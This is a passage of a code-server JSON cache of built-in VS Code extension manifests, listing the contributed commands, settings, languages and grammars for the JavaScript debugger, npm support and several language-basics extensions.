`runtimeExecutable` used for launch configurations, if unspecified. This can be used to config custom paths to Node.js or browser installations.","properties":{"pwa-node":{"type":"string"},"pwa-chrome":{"type":"string"},"pwa-msedge":{"type":"string"}}},"debug.javascript.resourceRequestOptions":{"type":"object","default":{},"markdownDescription":"Request options to use when loading resources, such as source maps, in the debugger. You may need to configure this if your sourcemaps require authentication or use a self-signed certificate, for instance. Options are used to create a request using the [`got`](https://github.com/sindresorhus/got) library.\n\nA common case to disable certificate verification can be done by passing `{ \"https\": { \"rejectUnauthorized\": false } }`."},"debug.javascript.enableNetworkView":{"type":"boolean","default":true,"description":"Enables the experimental network view for targets that support it."}}},"grammars":[{"language":"wat","scopeName":"text.wat","path":"./src/ui/basic-wat.tmLanguage.json"}],"languages":[{"id":"wat","extensions":[".wat",".wasm"],"aliases":["WebAssembly Text Format"],"firstLine":"^\\(module","mimetypes":["text/wat"],"configuration":"./src/ui/basic-wat.configuration.json"}],"terminal":{"profiles":[{"id":"extension.js-debug.debugTerminal","title":"JavaScript Debug Terminal","icon":"$(debug)"}]},"views":{"debug":[{"id":"jsBrowserBreakpoints","name":"Event Listener Breakpoints","when":"debugType == pwa-chrome || debugType == pwa-msedge"},{"id":"jsExcludedCallers","name":"Excluded Callers","when":"debugType == pwa-extensionHost && jsDebugHasExcludedCallers || debugType == node-terminal && jsDebugHasExcludedCallers || debugType == pwa-node && jsDebugHasExcludedCallers || debugType == pwa-chrome && jsDebugHasExcludedCallers || debugType == pwa-msedge && jsDebugHasExcludedCallers"},{"id":"jsDebugNetworkTree","name":"Network","when":"jsDebugNetworkAvailable"}]},"viewsWelcome":[{"view":"debug","contents":"[JavaScript Debug Terminal](command:extension.js-debug.createDebuggerTerminal)\n\nYou can use the JavaScript Debug Terminal to debug Node.js processes run on the command line.\n\n[Debug URL](command:extension.js-debug.debugLink)","when":"debugStartLanguage == javascript && !isWeb || debugStartLanguage == typescript && !isWeb || debugStartLanguage == javascriptreact && !isWeb || debugStartLanguage == typescriptreact && !isWeb"},{"view":"debug","contents":"[JavaScript Debug Terminal](command:extension.js-debug.createDebuggerTerminal)\n\nYou can use the JavaScript Debug Terminal to debug Node.js processes run on the command line.","when":"debugStartLanguage == javascript && isWeb || debugStartLanguage == typescript && isWeb || debugStartLanguage == javascriptreact && isWeb || debugStartLanguage == typescriptreact && isWeb"}]}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/ms-vscode.js-debug","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","metadata":{},"isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"ms-vscode.js-debug-companion"},"manifest":{"name":"js-debug-companion","displayName":"JavaScript Debugger Companion Extension","description":"Companion extension to js-debug that provides capability for remote debugging","version":"1.1.3","publisher":"ms-vscode","engines":{"vscode":"^1.90.0"},"icon":"resources/logo.png","categories":["Other"],"repository":{"type":"git","url":"https://github.com/microsoft/vscode-js-debug-companion.git"},"author":"Connor Peet ","license":"MIT","bugs":{"url":"https://github.com/microsoft/vscode-js-debug-companion/issues"},"homepage":"https://github.com/microsoft/vscode-js-debug-companion#readme","capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":true}},"activationEvents":["onCommand:js-debug-companion.launchAndAttach","onCommand:js-debug-companion.kill","onCommand:js-debug-companion.launch","onCommand:js-debug-companion.defaultBrowser"],"main":"./out/extension.js","contributes":{},"extensionKind":["ui"],"api":"none","prettier":{"trailingComma":"all","singleQuote":true,"printWidth":100,"tabWidth":2,"arrowParens":"avoid"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/ms-vscode.js-debug-companion","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","metadata":{},"isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"ms-vscode.vscode-js-profile-table"},"manifest":{"name":"vscode-js-profile-table","version":"1.0.10","displayName":"Table Visualizer for JavaScript Profiles","description":"Text visualizer for profiles taken from the JavaScript debugger","author":"Connor Peet ","homepage":"https://github.com/microsoft/vscode-js-profile-visualizer#readme","license":"MIT","main":"out/extension.js","browser":"out/extension.web.js","repository":{"type":"git","url":"https://github.com/microsoft/vscode-js-profile-visualizer.git"},"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"icon":"resources/icon.png","publisher":"ms-vscode","sideEffects":false,"engines":{"vscode":"^1.74.0"},"contributes":{"customEditors":[{"viewType":"jsProfileVisualizer.cpuprofile.table","displayName":"CPU Profile Table Visualizer","priority":"default","selector":[{"filenamePattern":"*.cpuprofile"}]},{"viewType":"jsProfileVisualizer.heapprofile.table","displayName":"Heap Profile Table Visualizer","priority":"default","selector":[{"filenamePattern":"*.heapprofile"}]},{"viewType":"jsProfileVisualizer.heapsnapshot.table","displayName":"Heap Snapshot Table Visualizer","priority":"default","selector":[{"filenamePattern":"*.heapsnapshot"}]}],"commands":[{"command":"extension.jsProfileVisualizer.table.clearCodeLenses","title":"Clear Profile Code Lenses"}],"menus":{"commandPalette":[{"command":"extension.jsProfileVisualizer.table.clearCodeLenses","when":"jsProfileVisualizer.hasCodeLenses == true"}]}},"bugs":{"url":"https://github.com/microsoft/vscode-js-profile-visualizer/issues"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/ms-vscode.vscode-js-profile-table","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","metadata":{},"isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.builtin-notebook-renderers"},"manifest":{"name":"builtin-notebook-renderers","displayName":"Builtin Notebook Output Renderers","description":"Provides basic output renderers for notebooks","publisher":"vscode","version":"1.0.0","license":"MIT","icon":"media/icon.png","engines":{"vscode":"^1.57.0"},"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"contributes":{"notebookRenderer":[{"id":"vscode.builtin-renderer","entrypoint":"./renderer-out/index.js","displayName":"VS Code Builtin Notebook Output Renderer","requiresMessaging":"never","mimeTypes":["image/gif","image/png","image/jpeg","image/git","image/svg+xml","text/html","application/javascript","application/vnd.code.notebook.error","application/vnd.code.notebook.stdout","application/x.notebook.stdout","application/x.notebook.stream","application/vnd.code.notebook.stderr","application/x.notebook.stderr","text/plain"]}]},"scripts":{"compile":"npx gulp compile-extension:notebook-renderers && npm run build-notebook","watch":"npx gulp compile-watch:notebook-renderers","build-notebook":"node ./esbuild.mjs"},"devDependencies":{"@types/jsdom":"^21.1.0","@types/node":"^22.18.10","@types/vscode-notebook-renderer":"^1.60.0","jsdom":"^21.1.1"},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/notebook-renderers","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.npm"},"manifest":{"name":"npm","publisher":"vscode","displayName":"NPM support for VS Code","description":"Extension to add task support for npm scripts.","version":"1.0.1","private":true,"license":"MIT","engines":{"vscode":"0.10.x"},"icon":"images/npm_icon.png","categories":["Other"],"enabledApiProposals":["terminalQuickFixProvider"],"main":"./dist/npmMain","browser":"./dist/browser/npmBrowserMain","activationEvents":["onTaskType:npm","onLanguage:json","workspaceContains:package.json"],"capabilities":{"virtualWorkspaces":{"supported":"limited","description":"Functionality that requires running the 'npm' command is not available in virtual workspaces."},"untrustedWorkspaces":{"supported":"limited","description":"This extension executes tasks, which require trust to run."}},"contributes":{"languages":[{"id":"ignore","extensions":[".npmignore"]},{"id":"properties","extensions":[".npmrc"]}],"views":{"explorer":[{"id":"npm","name":"NPM Scripts","when":"npm:showScriptExplorer","icon":"$(json)","visibility":"hidden","contextualTitle":"NPM Scripts"}]},"commands":[{"command":"npm.runScript","title":"Run","icon":"$(run)"},{"command":"npm.debugScript","title":"Debug","icon":"$(debug)"},{"command":"npm.openScript","title":"Open"},{"command":"npm.runInstall","title":"Run Install"},{"command":"npm.refresh","title":"Refresh","icon":"$(refresh)"},{"command":"npm.runSelectedScript","title":"Run Script"},{"command":"npm.runScriptFromFolder","title":"Run NPM Script in Folder..."},{"command":"npm.packageManager","title":"Get Configured Package Manager"}],"menus":{"commandPalette":[{"command":"npm.refresh","when":"false"},{"command":"npm.runScript","when":"false"},{"command":"npm.debugScript","when":"false"},{"command":"npm.openScript","when":"false"},{"command":"npm.runInstall","when":"false"},{"command":"npm.runSelectedScript","when":"false"},{"command":"npm.runScriptFromFolder","when":"false"},{"command":"npm.packageManager","when":"false"}],"editor/context":[{"command":"npm.runSelectedScript","when":"resourceFilename == 'package.json' && resourceScheme == file","group":"navigation@+1"}],"view/title":[{"command":"npm.refresh","when":"view == npm","group":"navigation"}],"view/item/context":[{"command":"npm.openScript","when":"view == npm && viewItem == packageJSON","group":"navigation@1"},{"command":"npm.runInstall","when":"view == npm && viewItem == packageJSON","group":"navigation@2"},{"command":"npm.openScript","when":"view == npm && viewItem == script","group":"navigation@1"},{"command":"npm.runScript","when":"view == npm && viewItem == script","group":"navigation@2"},{"command":"npm.runScript","when":"view == npm && viewItem == script","group":"inline"},{"command":"npm.debugScript","when":"view == npm && viewItem == script","group":"inline"},{"command":"npm.debugScript","when":"view == npm && viewItem == script","group":"navigation@3"}],"explorer/context":[{"when":"config.npm.enableRunFromFolder && explorerViewletVisible && explorerResourceIsFolder && resourceScheme == file","command":"npm.runScriptFromFolder","group":"2_workspace"}]},"configuration":{"id":"npm","type":"object","title":"Npm","properties":{"npm.autoDetect":{"type":"string","enum":["off","on"],"default":"on","scope":"resource","description":"Controls whether npm scripts should be automatically detected."},"npm.runSilent":{"type":"boolean","default":false,"scope":"resource","markdownDescription":"Run npm commands with the `--silent` option."},"npm.packageManager":{"scope":"resource","type":"string","enum":["auto","npm","yarn","pnpm","bun"],"enumDescriptions":["Auto-detect which package manager to use based on lock files and installed package managers.","Use npm as the package manager.","Use yarn as the package manager.","Use pnpm as the package manager.","Use bun as the package manager."],"default":"auto","description":"The package manager used to install dependencies."},"npm.scriptRunner":{"scope":"resource","type":"string","enum":["auto","npm","yarn","pnpm","bun","node"],"enumDescriptions":["Auto-detect which script runner to use based on lock files and installed package managers.","Use npm as the script runner.","Use yarn as the script runner.","Use pnpm as the script runner.","Use bun as the script runner.","Use Node.js as the script runner."],"default":"auto","description":"The script runner used to run scripts."},"npm.exclude":{"type":["string","array"],"items":{"type":"string"},"description":"Configure glob patterns for folders that should be excluded from automatic script detection.","scope":"resource"},"npm.enableScriptExplorer":{"type":"boolean","default":false,"scope":"resource","deprecationMessage":"The NPM Script Explorer is now available in 'Views' menu in the Explorer in all folders.","description":"Enable an explorer view for npm scripts when there is no top-level 'package.json' file."},"npm.enableRunFromFolder":{"type":"boolean","default":false,"scope":"resource","description":"Enable running npm scripts contained in a folder from the Explorer context menu."},"npm.scriptExplorerAction":{"type":"string","enum":["open","run"],"markdownDescription":"The default click action used in the NPM Scripts Explorer: `open` or `run`, the default is `open`.","scope":"window","default":"open"},"npm.scriptExplorerExclude":{"type":"array","items":{"type":"string"},"markdownDescription":"An array of regular expressions that indicate which scripts should be excluded from the NPM Scripts view.","scope":"resource","default":[]},"npm.fetchOnlinePackageInfo":{"type":"boolean","description":"Fetch data from https://registry.npmjs.org and https://registry.bower.io to provide auto-completion and information on hover features on npm dependencies.","default":true,"scope":"window","tags":["usesOnlineServices"]},"npm.scriptHover":{"type":"boolean","description":"Display hover with 'Run' and 'Debug' commands for scripts.","default":true,"scope":"window"}}},"jsonValidation":[{"fileMatch":"package.json","url":"https://www.schemastore.org/package"},{"fileMatch":"bower.json","url":"https://www.schemastore.org/bower"}],"taskDefinitions":[{"type":"npm","required":["script"],"properties":{"script":{"type":"string","description":"The npm script to customize."},"path":{"type":"string","description":"The path to the folder of the package.json file that provides the script. Can be omitted."}},"when":"shellExecutionSupported"}],"terminalQuickFixes":[{"id":"ms-vscode.npm-command","commandLineMatcher":"npm","commandExitResult":"error","outputMatcher":{"anchor":"bottom","length":8,"lineMatcher":"Did you mean (?:this|one of these)\\?((?:\\n.+?npm .+ #.+)+)","offset":2}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/npm","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.objective-c"},"manifest":{"name":"objective-c","displayName":"Objective-C Language Basics","description":"Provides syntax highlighting and bracket matching in Objective-C files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ./build/update-grammars.js"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"objective-c","extensions":[".m"],"aliases":["Objective-C"],"configuration":"./language-configuration.json"},{"id":"objective-cpp","extensions":[".mm"],"aliases":["Objective-C++"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"objective-c","scopeName":"source.objc","path":"./syntaxes/objective-c.tmLanguage.json"},{"language":"objective-cpp","scopeName":"source.objcpp","path":"./syntaxes/objective-c++.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/objective-c","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.perl"},"manifest":{"name":"perl","displayName":"Perl Language Basics","description":"Provides syntax highlighting and bracket matching in Perl files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin textmate/perl.tmbundle Syntaxes/Perl.plist ./syntaxes/perl.tmLanguage.json Syntaxes/Perl%206.tmLanguage ./syntaxes/perl6.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"perl","aliases":["Perl","perl"],"extensions":[".pl",".pm",".pod",".t",".PL",".psgi"],"firstLine":"^#!.*\\bperl\\b","configuration":"./perl.language-configuration.json"},{"id":"raku","aliases":["Raku","Perl6","perl6"],"extensions":[".raku",".rakumod",".rakutest",".rakudoc",".nqp",".p6",".pl6",".pm6"],"firstLine":"(^#!.*\\bperl6\\b)|use\\s+v6|raku|=begin\\spod|my\\sclass","configuration":"./perl6.language-configuration.json"}],"grammars":[{"language":"perl","scopeName":"source.perl","path":"./syntaxes/perl.tmLanguage.json","unbalancedBracketScopes":["variable.other.predefined.perl"]},{"language":"raku","scopeName":"source.perl.6","path":"./syntaxes/perl6.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/perl","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.php"},"manifest":{"name":"php","displayName":"PHP Language Basics","description":"Provides syntax highlighting and bracket matching for PHP files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"php","extensions":[".php",".php4",".php5",".phtml",".ctp"],"aliases":["PHP","php"],"firstLine":"^#!\\s*/.*\\bphp\\b","mimetypes":["application/x-php"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"php","scopeName":"source.php","path":"./syntaxes/php.tmLanguage.json"},{"language":"php","scopeName":"text.html.php","path":"./syntaxes/html.tmLanguage.json","embeddedLanguages":{"text.html":"html","source.php":"php","source.sql":"sql","text.xml":"xml","source.js":"javascript","source.json":"json","source.css":"css"}}],"snippets":[{"language":"php","path":"./snippets/php.code-snippets"}]},"scripts":{"update-grammar":"node ./build/update-grammar.mjs"},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/php","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.php-language-features"},"manifest":{"name":"php-language-features","displayName":"PHP Language Features","description":"Provides rich language support for PHP files.","version":"1.0.0","publisher":"vscode","license":"MIT","icon":"icons/logo.png","engines":{"vscode":"0.10.x"},"activationEvents":["onLanguage:php"],"main":"./dist/phpMain","categories":["Programming Languages"],"capabilities":{"virtualWorkspaces":false,"untrustedWorkspaces":{"supported":"limited","description":"The extension requires workspace trust when the `php.validate.executablePath` setting will load a version of PHP in the workspace.","restrictedConfigurations":["php.validate.executablePath"]}},"contributes":{"configuration":{"title":"PHP","type":"object","order":20,"properties":{"php.suggest.basic":{"type":"boolean","default":true,"description":"Controls whether the built-in PHP language suggestions are enabled. The support suggests PHP globals and variables."},"php.validate.enable":{"type":"boolean","default":true,"description":"Enable/disable built-in PHP validation."},"php.validate.executablePath":{"type":["string","null"],"default":null,"description":"Points to the PHP executable.","scope":"machine-overridable"},"php.validate.run":{"type":"string","enum":["onSave","onType"],"default":"onSave","description":"Whether the linter is run on save or on type."}}},"jsonValidation":[{"fileMatch":"composer.json","url":"https://getcomposer.org/schema.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/php-language-features","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.powershell"},"manifest":{"name":"powershell","displayName":"Powershell Language Basics","description":"Provides snippets, syntax highlighting, bracket matching and folding in Powershell files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"powershell","extensions":[".ps1",".psm1",".psd1",".pssc",".psrc"],"aliases":["PowerShell","powershell","ps","ps1","pwsh"],"firstLine":"^#!\\s*/.*\\bpwsh\\b","configuration":"./language-configuration.json"}],"grammars":[{"language":"powershell","scopeName":"source.powershell","path":"./syntaxes/powershell.tmLanguage.json"}]},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin PowerShell/EditorSyntax PowerShellSyntax.tmLanguage ./syntaxes/powershell.tmLanguage.json"},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/powershell","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.prompt"},"manifest":{"name":"prompt","displayName":"Prompt Language Basics","description":"Syntax highlighting for Prompt and Instructions documents.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.20.0"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"prompt","aliases":["Prompt","prompt"],"extensions":[".prompt.md"],"configuration":"./language-configuration.json"},{"id":"instructions","aliases":["Instructions","instructions"],"extensions":[".instructions.md","copilot-instructions.md"],"configuration":"./language-configuration.json"},{"id":"chatagent","aliases":["Agent","chat agent"],"extensions":[".agent.md",".chatmode.md"],"filenamePatterns":["**/.github/agents/*.md"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"prompt","path":"./syntaxes/prompt.tmLanguage.json","scopeName":"text.html.markdown.prompt","unbalancedBracketScopes":["markup.underline.link.markdown","punctuation.definition.list.begin.markdown"]},{"language":"instructions","path":"./syntaxes/prompt.tmLanguage.json","scopeName":"text.html.markdown.prompt","unbalancedBracketScopes":["markup.underline.link.markdown","punctuation.definition.list.begin.markdown"]},{"language":"chatagent","path":"./syntaxes/prompt.tmLanguage.json","scopeName":"text.html.markdown.prompt","unbalancedBracketScopes":["markup.underline.link.markdown","punctuation.definition.list.begin.markdown"]}],"configurationDefaults":{"[prompt]":{"editor.insertSpaces":true,"editor.tabSize":2,"editor.autoIndent":"advanced","editor.unicodeHighlight.ambiguousCharacters":false,"editor.unicodeHighlight.invisibleCharacters":false,"diffEditor.ignoreTrimWhitespace":false,"editor.wordWrap":"on","editor.quickSuggestions":{"comments":"off","strings":"on","other":"on"},"editor.wordBasedSuggestions":"off"},"[instructions]":{"editor.insertSpaces":true,"editor.tabSize":2,"editor.autoIndent":"advanced","editor.unicodeHighlight.ambiguousCharacters":false,"editor.unicodeHighlight.invisibleCharacters":false,"diffEditor.ignoreTrimWhitespace":false,"editor.wordWrap":"on","editor.quickSuggestions":{"comments":"off","strings":"on","other":"on"},"editor.wordBasedSuggestions":"off"},"[chatagent]":{"editor.insertSpaces":true,"editor.tabSize":2,"editor.autoIndent":"advanced","editor.unicodeHighlight.ambiguousCharacters":false,"editor.unicodeHighlight.invisibleCharacters":false,"diffEditor.ignoreTrimWhitespace":false,"editor.wordWrap":"on","editor.quickSuggestions":{"comments":"off","strings":"on","other":"on"},"editor.wordBasedSuggestions":"off"}}},"scripts":{},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/prompt-basics","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.pug"},"manifest":{"name":"pug","displayName":"Pug Language Basics","description":"Provides syntax highlighting and bracket matching in Pug files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin davidrios/pug-tmbundle Syntaxes/Pug.JSON-tmLanguage ./syntaxes/pug.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"jade","extensions":[".pug",".jade"],"aliases":["Pug","Jade","jade"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"jade","scopeName":"text.pug","path":"./syntaxes/pug.tmLanguage.json"}],"configurationDefaults":{"[jade]":{"diffEditor.ignoreTrimWhitespace":false}}},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/pug","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.python"},"manifest":{"name":"python","displayName":"Python Language Basics","description":"Provides syntax highlighting, bracket matching and folding in Python files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"python","extensions":[".py",".rpy",".pyw",".cpy",".gyp",".gypi",".pyi",".ipy",".pyt"],"aliases":["Python","py"],"filenames":["SConstruct","SConscript"],"firstLine":"^#!\\s*/?.*\\bpython[0-9.-]*\\b","configuration":"./language-configuration.json"}],"grammars":[{"language":"python","scopeName":"source.python","path":"./syntaxes/MagicPython.tmLanguage.json"},{"scopeName":"source.regexp.python","path":"./syntaxes/MagicRegExp.tmLanguage.json"}],"configurationDefaults":{"[python]":{"diffEditor.ignoreTrimWhitespace":false,"editor.defaultColorDecorators":"never"}}},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin MagicStack/MagicPython grammars/MagicPython.tmLanguage ./syntaxes/MagicPython.tmLanguage.json grammars/MagicRegExp.tmLanguage ./syntaxes/MagicRegExp.tmLanguage.json"},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/python","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.r"},"manifest":{"name":"r","displayName":"R Language Basics","description":"Provides syntax highlighting and bracket matching in R files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"*"},"scripts":{"update-grammar":"node ../node_modules/vscode-grammar-updater/bin REditorSupport/vscode-R-syntax syntaxes/r.json ./syntaxes/r.tmLanguage.json"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"r","extensions":[".r",".rhistory",".rprofile",".rt"],"aliases":["R","r"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"r","scopeName":"source.r","path":"./syntaxes/r.tmLanguage.json"}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/r","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.razor"},"manifest":{"name":"razor","displayName":"Razor Language Basics","description":"Provides syntax highlighting, bracket matching and folding in Razor files.","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"0.10.x"},"scripts":{"update-grammar":"node ./build/update-grammar.mjs"},"categories":["Programming Languages"],"contributes":{"languages":[{"id":"razor","extensions":[".cshtml",".razor"],"aliases":["Razor","razor"],"mimetypes":["text/x-cshtml"],"configuration":"./language-configuration.json"}],"grammars":[{"language":"razor","scopeName":"text.html.cshtml","path":"./syntaxes/cshtml.tmLanguage.json","embeddedLanguages":{"section.embedded.source.cshtml":"csharp","source.css":"css","source.js":"javascript"}}]},"repository":{"type":"git","url":"https://github.com/microsoft/vscode.git"}},"location":{"$mid":1,"path":"/usr/lib/code-server/lib/vscode/extensions/razor","scheme":"file"},"isBuiltin":true,"targetPlatform":"undefined","isValid":true,"validations":[],"preRelease":false},{"type":0,"identifier":{"id":"vscode.references-view"},"manifest":{"name":"references-view","displayName":"Reference Search View","description":"Reference Search results as separate, stable view in the sidebar","icon":"media/icon.png","version":"1.0.0","publisher":"vscode","license":"MIT","engines":{"vscode":"^1.67.0"},"capabilities":{"virtualWorkspaces":true,"untrustedWorkspaces":{"supported":true}},"repository":{"type":"git","url":"https://github.com/Microsoft/vscode-references-view"},"bugs":{"url":"https://github.com/Microsoft/vscode-references-view/issues"},"activationEvents":["onCommand:references-view.find","onCommand:editor.action.showReferences"],"main":"./dist/extension","browser":"./dist/extension.js","contributes":{"configuration":{"properties":{"references.preferredLocation":{"description":"Controls whether 'Peek References' or 'Find References' is invoked when selecting CodeLens references.","type":"string","default":"peek","enum":["peek","view"],"enumDescriptions":["Show references in peek editor.","Show references in separate view."]}}},"viewsContainers":{"activitybar":[{"id":"references-view","icon":"$(references)","title":"References"}]},"views":{"references-view":[{"id":"references-view.tree","name":"Reference Search Results","when":"reference-list.isActive"}]},"commands":[{"command":"references-view.findReferences","title":"Find All References","category":"References"},{"command":"references-view.findImplementations","title":"Find All Implementations","category":"References"},{"command":"references-view.clearHistory","title":"Clear History","category":"References","icon":"$(clear-all)"},{"command":"references-view.clear","title":"Clear","category":"References","icon":"$(clear-all)"},{"command":"references-view.refresh","title":"Refresh","category":"References","icon":"$(refresh)"},{"command":"references-view.pickFromHistory","title":"Show History","category":"References"},{"command":"references-view.removeReferenceItem","title":"Dismiss","icon":"$(close)"},{"command":"references-view.copy","title":"Copy"},{"command":"references-view.copyAll","title":"Copy All"},{"command":"references-view.copyPath","title":"Copy Path"},{"command":"references-view.refind","title":"Rerun","icon":"$(refresh)"},{"command":"references-view.showCallHierarchy","title":"Show Call Hierarchy","category":"Calls"},{"command":"references-view.showOutgoingCalls","title":"Show Outgoing Calls","category":"Calls","icon":"$(call-incoming)"},{"command":"references-view.showIncomingCalls","title":"Show Incoming Calls","category":"Calls","icon":"$(call-outgoing)"},{"command":"references-view.removeCallItem","title":"Dismiss","icon":"$(close)"},{"command":"references-view.next","title":"Go to Next Reference","enablement":"references-view.canNavigate"},{"command":"references-view.prev","title":"Go to Previous Reference","enablement":"references-view.canNavigate"},{"command":"references-view.showTypeHierarchy","title":"Show Type Hierarchy","category":"Types"},{"command":"references-view.showSupertypes","title":"Show Supertypes","category":"Types","icon":"$(type-hierarchy-super)"},{"command":"references-view.showSubtypes","title":"Show Subtypes","category":"Types","icon":"$(type-hierarchy-sub)"},{"command":"references-view.removeTypeItem","title":"Dismiss","icon":"$(close)"}],"menus":{"editor/context":[{"command":"references-view.findReferences","when":"editorHasReferenceProvider","group":"0_navigation@1"},{"command":"references-view.findImplementations","when":"editorHasImplementationProvider","group":"0_navigation@2"},{"command":"references-view.showCallHierarchy","when":"editorHasCallHierarchyProvider","group":"0_navigation@3"},{"command":"references-view.showTypeHierarchy","when":"editorHasTypeHierarchyProvider","group":"0_navigation@4"}],"view/title":[{"command":"references-view.clear","group":"navigation@3","when":"view == references-view.tree && reference-list.hasResult"},{"command":"references-view.clearHistory","group":"navigation@3","when":"view == references-view.tree && reference-list.hasHistory && !reference-list.hasResult"},{"command":"references-view.refresh","group":"navigation@2","when":"view == references-view.tree && reference-list.hasResult"},{"command":"references-view.showOutgoingCalls","group":"navigation@1","when":"view == references-view.tree && reference-list.hasResult && reference-list.source == callHierarchy && references-view.callHierarchyMode == showIncoming"},{"command":"references-view.showIncomingCalls","group":"navigation@1","when":"view == references-view.tree && reference-list.hasResult && reference-list.source == callHierarchy && references-view.callHierarchyMode == showOutgoing"},{"command":"references-view.showSupertypes","group":"navigation@1","when":"view == references-view.tree && reference-list.hasResult && reference-list.source == typeHierarchy && references-view.typeHierarchyMode != supertypes"},{"command":"references-view.showSubtypes","group":"navigation@1","when":"view == references-view.tree && reference-list.hasResult && reference-list.source == typeHierarchy && references-view.typeHierarchyMode != subtypes"}],"view/item/context":[{"command":"references-view.removeReferenceItem","group":"inline","when":"view == references-view.tree && viewItem == file-item || view == references-view.tree && viewItem == reference-item"},{"command":"references-view.removeCallItem","group":"inline","when":"view == references-view.tree && viewItem == call-item"},{"command":"references-view.removeTypeItem","group":"inline","when":"view == references-view.tree && viewItem == type-item"},{"command":"references-view.refind","group":"inline","when":"view == references-view.tree && viewItem == history-item"},{"command":"references-view.removeReferenceItem","group":"1","when":"view == references-view.tree && viewItem == file-item || view == references-view.tree && viewItem == reference-item"},{"command":"references-view.removeCallItem","group":"1","when":"view == references-view.tree && viewItem 